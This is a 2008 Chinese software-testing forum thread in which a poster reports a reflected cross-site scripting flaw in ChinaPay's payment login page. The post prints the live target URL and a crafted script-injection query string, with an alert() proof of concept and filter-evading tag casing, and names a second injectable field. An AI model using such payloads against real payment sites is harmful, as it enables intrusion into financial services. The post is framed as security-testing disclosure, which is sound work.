51Testing软件测试论坛
标题:
[原创]银联电子支付chinapay安全性测试漏洞之“跨站脚本注入式攻击”
[打印本页]
作者:
卖烧烤的鱼
时间:
2008-6-12 16:33
标题:
[原创]银联电子支付chinapay安全性测试漏洞之“跨站脚本注入式攻击”
[原创]银联电子支付chinapay安全性测试漏洞之“跨站脚本注入式攻击”
网站安全性测试,尤为重要,电子支付网站更是如此,本文作者以实例介绍了
(1)“Yeepay网站安全测试漏洞之跨站脚本注入”,原文地址:
http://bbs.51testing.com/thread-113784-1-1.html
;
(2)“网银在线chinabank安全漏洞之不完善的开发软件包”,原文地址:
http://bbs.51testing.com/thread-116660-1-1.html
(3)“支付宝alipay网站安全性测试漏洞之“无辜的备份文件”,原文地址:
http://bbs.51testing.com/thread-116821-1-1.html
(4)“支付宝alipay网站安全性测试漏洞之“跨站脚本注入式攻击”,原文地址:
http://bbs.51testing.com/thread-116826-1-1.html
(5)“快钱99bill网站安全性测试漏洞之“跨站式脚本注入”,原文地址:
http://bbs.51testing.com/thread-116883-1-1.html
(6)“银联电子支付chinapay安全性测试漏洞之“不安全的目录设置”,原文地址:
http://bbs.51testing.com/thread-117382-1-1.html
如果你想了解更多软件测试,安全性测试,性能测试,自动化测试,测试管理等知识!
欢迎访问我的Blog:卖烧烤的鱼的测试博客:
http://mayingbao.cnblogs.com
银联电子支付chinapay存在“跨站脚本注入式攻击”,经本文作者验证
https://payment.chinapay.com/trf/G_chklogin.jsp
此部分存在漏洞,于是构造脚本
:
https://payment.chinapay.com/trf/G_chklogin.jsp?EncMsg=
>'><ScRiPt%20%0a%0d>alert(888888888888888888888)%3B</ScRiPt>&ret=mayingbao2002@163.com&IPAddr=61%2E129%2E122%2E135%3A8081%2Ftrf%2F
访问后,弹出如下图
PS:经本文作者验证:
https://payment.chinapay.com/trf/G_chklogin.jsp
此部分也存在漏洞,
其中分析得出最佳祸手为“ txtId ”字段^_^
作者:
阿七
时间:
2008-6-18 09:25
鱼兄 有空出个录像教程哈
^_^
作者:
QQHao
时间:
2008-9-4 11:43
lz 有空应该交流一下如何做黑客哦
作者:
flyweb
时间:
2008-9-4 23:08
这类注入只是恶作剧摆了
一方面体现在浏览器对Unicode的处理漏洞
另一方面针对表单对特定字符的过滤处理不当
作者:
lihy2011
时间:
2011-5-20 09:39
新手逛园 留个爪爪
欢迎光临 51Testing软件测试论坛 (http://bbs.51testing.com/)
Powered by Discuz! X3.2